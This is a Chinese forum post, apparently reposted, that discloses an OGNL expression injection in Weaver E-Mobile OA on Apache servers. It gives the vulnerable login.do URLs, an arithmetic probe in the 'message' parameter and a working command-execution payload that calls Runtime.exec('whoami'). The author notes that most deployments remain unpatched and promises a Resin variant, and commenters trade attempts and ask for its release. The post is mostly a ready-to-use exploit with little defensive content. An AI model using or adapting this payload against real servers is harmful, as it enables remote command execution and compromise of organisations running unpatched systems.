Ognl表达式注入?命令执行?你来判断。

自评TCV = 0
泛微 E-Mobile 表达式注入?大概?这个洞是一个月以前,老师丢给我玩的,叫我学习一下。
拿到的时候一脸懵逼,什么是表达式注入?去漏洞库看了一圈。(・。・) 噢!原来可以执行算术运算就是表达式注入呀!要怎么玩?当计算器用么?~ヾ(*´∇`)ノ

一、泛微OA E-Mobile WebServer:Apache 通用部分:apache
官方有两个OA。一个是apache的 一个是Resin的。
Resin的也找到姿势通杀了,但是Resin涉及的站太大了。。。暂时不放出来,因为好像和S2撞洞了?因为045打了WAF的 ,我这个可以执行命令。23333 我也不知道~
1、登录页面如下
  1. http://6.6.6.6/login.do?
  2. or
  3. http://6.6.6.6/login/login.do?
Ognl表达式注入?命令执行?你来判断。_第1张图片


2、当账号密码报错的时候,出现如下URL
Ognl表达式注入?命令执行?你来判断。_第2张图片


3、计算器
  1. http://6.6.6.6/login.do?message=66*66*66-66666
Ognl表达式注入?命令执行?你来判断。_第3张图片

o(>ω<)o 这么神奇么~

4、命令执行
  1. 有的表达式注入是${code}。这里隐藏了${},所以直接调用就行了。
  2. @org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream())
Ognl表达式注入?命令执行?你来判断。_第4张图片

关于作者

Ognl表达式注入?命令执行?你来判断。_第5张图片
wobushou 5篇文章 139篇回复

评论8次

老鬼
  • 8楼
    oopww
    Rank: 2
    昨天 17:19

    寻求Resin姿势,范微不一定装了 E-Mobile

    回复 | @ta
  • 7楼
    wobushou
    Rank: 1
    5 天前 12:48
    这只猪:

    这个是新漏洞还是什么情况情况。。。

    回复 | @ta
    1

    新的,除了官方修复了,大部分还没修复。

    回复 | @ta
  • 6楼
    这只猪
    Rank: 1
    5 天前 10:11

    这个是新漏洞还是什么情况情况。。。

    回复 | @ta
  • 5楼
    wobushou
    Rank: 1
    6 天前 10:08
    jkrow:

    Resin啥时候放出来

    回复 | @ta
    1

    一个星期后吧。

    回复 | @ta
  • 4楼
    jkrow
    Rank: 2
    6 天前 10:04

    Resin啥时候放出来

    回复 | @ta
  • 3楼
    wobushou
    Rank: 1
    7 天前 20:39
    byyun189:

    执行不了但是运算message=66*66*66-66666能显示结果这是阿帕奇版本。

    回复 | @ta
    1

    你多试几个看看?

    回复 | @ta
  • 2楼
    byyun189
    Rank: 1
    7 天前 20:09

    执行不了但是运算message=66*66*66-66666能显示结果这是阿帕奇版本。

    回复 | @ta
  • 1楼
    byyun189
    Rank: 1
    7 天前 20:07

    为什么message=66*66*66-66666能显示结果。执行@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream())不行尼?

你可能感兴趣的:(java-hack)